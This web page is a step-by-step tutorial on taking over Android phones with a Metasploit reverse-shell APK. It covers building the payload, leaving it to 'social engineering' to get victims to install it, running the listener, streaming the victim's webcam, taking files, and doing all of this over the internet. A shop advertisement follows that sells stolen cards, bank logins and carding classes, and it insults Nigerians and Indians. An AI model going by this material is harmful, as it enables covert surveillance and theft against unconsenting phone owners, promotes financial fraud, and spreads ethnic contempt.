You are currently viewing How to Hack Android Devices Using Metasploit

How to Hack Android Devices Using Metasploit

How to Hack Android Devices Using Metasploit

In this tutorial, I’ll be teaching you how to hack Android devices such as phones and tablets using Metasploit.
I’m going to be using Sana (Kali 2.0) for this tutorial, but you’re welcome to use any distro you want as long as it can run Metasploit.
This is very easy to do – simply follow the below steps and you should be good to go.

Part 1: Generating The Payload

  • To generate the payload, open up a terminal and type in the following commands:
    • Code
    • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.225 LPORT=444 R > randomfile.apk
    • [Image: 8502b5a960.png]
  • Here, android/meterpreter/reverse_tcp is the name of the payload we’re going to be using.
  • LHOST is the IP address to which the client is going to connect (your IP address).
  • To find it, open up a new terminal and type in ifconfig.
  • Your IP address will be where I’ve highlighted the text:
  • [Image: 604077e0a4.png]
  • LPORT can be essentially any valid port number on your machine, you just need to make sure that it’s not currently in use.
  • Replace RandomFile.apk with your file name.
  • Hit ENTER and your payload should be generated successfully.
  • The apk file that was generated is the one you want the target device to run. This may require some social engineering skills, I’ll just leave that to you.

Part 2: The Exploit

Once the payload has been successfully transferred to the target device, we need to start listening on the specified address and port to exploit the device.
For this, let’s open up the Metasploit console.

  • Enter the following commands:
    • Code
    • service postgresql start
    • msfconsole
  • That’s going to open up the Metasploit console.

Now we want to use a payload handler for handling our reverse TCP connection.

  • For this, type the following in the Metasploit terminal:
    • Code
    • use multi/handler
    • [Image: 7ed7b4aa48.png]

You should now have a prompt that says exploit (handler). Awesome, now let’s set the options.

  • To do that, enter the following commands:
    • Code
    • set PAYLOAD android/meterpreter/reverse_tcp
    • set LHOST Your_IP
    • set LPORT Port_Number

Replace the required info with yours in the above commands.

  • Now type the following command and verify all the options:
    • Code
    • show options
    • This is what my configuration looks like:
    • [Image: 5c3773b325.png]
If you’re certain all the options are valid, enter the following command to start the handler (listening):
  • Code
  • exploit
  • [Image: 1bfc159615.png]

As soon as the device executes the payload (opens the app), your Meterpreter terminal should say “Meterpreter session one opened” or something of that sort.
This means you have successfully gained access to the device.

To view the list of available commands, just put a question mark (?) and hit ENTER.
[Image: 2593949725.png]

To use a command, simply type the name of the command and hit ENTER. If it requires any parameters, it will mention that.

Some useful commands:
To stream video from the device’s camera live, use the following command:
Code
webcam_stream

To download/upload files from/to the device:
Code
download/upload %FILEPATH%
Over The Internet
In the above case, everything was attempted on a local network.
In case you wish to do this over the internet, follow the same steps. Instead of using ifconfig, use the following command:
Code
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com
You would also need to enable port forwarding on your router for it to work over the internet.

That’s pretty much it. If you have any questions or if I’ve made any mistakes, just let me know.

Henceforth, WE WISH TO ANNOUNCE THAT OUR SERVICES ARE NOT AVAILABLE TO PEOPLE FROM NIGERIA AND INDIA. THESE ARE USELESS TIME WASTERS AND THIEVES TRYING TO BEG OR SCAM US OF OUR PRODUCTS. OUR SERVICES ARE NOT FREE AND PAYMENT IS UPFRONT

A LOT OF FOOLS FROM NIGERIA AND INDIA. on the off chance that YOU DON’T TRUST TO USE OUR SERVICES, DON’T CONTACT US AS WE HAVE NO FREE SERVICE

CONTACT US FOR PURCHASE/INQUIRIES, WE RESPOND ALMOST INSTANTLY 

HI BUYERS, WE ARE A PROFESSIONAL CARDING AND HACKING TEAM. HOVATOOLS HAS BEEN AROUND SINCE THE TIME OF EVO MARKET, ALPHABAY, WALLSTREET MARKET AND MORE. WE REMAIN STRONG AND RELIABLE IN THE INDUSTRY, ALWAYS PROVIDING YOU WITH THE BEST QUALITY TOOLS TO HELP YOU MAKE MONEY AND MAXIMIZE PROFIT IN THE FRAUD GAME.

TO GET STARTED, YOU CAN VISIT OUR ONLINE SHOP/STORE TO BUY EVERYTHING YOU NEED TO START CASHING OUT.  AT THE SHOP YOU GET Accounts & Bank Drops CVV & CARDS DUMPS PERSONAL INFORMATION & SCAN.

BANK HACKING SOFTWARE – WIRE/ACH DARKWEB MONEY TRANSFER HACKERS

Buy Fresh Credit Cards for Carding, BIN LIST Buy Bank Login, RDP, Buy Hacked Paypal accounts. Contact us to buy all tools and carding software. CLICK HERE TO VISIT OUR SHOP
Buy Socks 5, Email Leads, Buy Latest CC to Bitcoin Cashout Guide, Buy Hacked Zelle transfer , Western Union Money Transfer Hack, Buy Hacked Money Transfer service to your bank account.
Enroll for Paid private Carding Class.

Admin

The enigmatic hacking blogger who unravels the digital mysteries through his captivating blog. With relentless curiosity and a nimble touch on the keyboard, I explore the intricate web of cyberspace, exposing vulnerabilities and advocating for responsible digital citizenship. My poetic and insightful articles paint vivid pictures of the ethical dilemmas surrounding privacy, encryption, and the convergence of technology and humanity. Join me on an exhilarating journey through the labyrinth of hacking and cybersecurity as he empowers readers to become guardians of their online identities.

Leave a Reply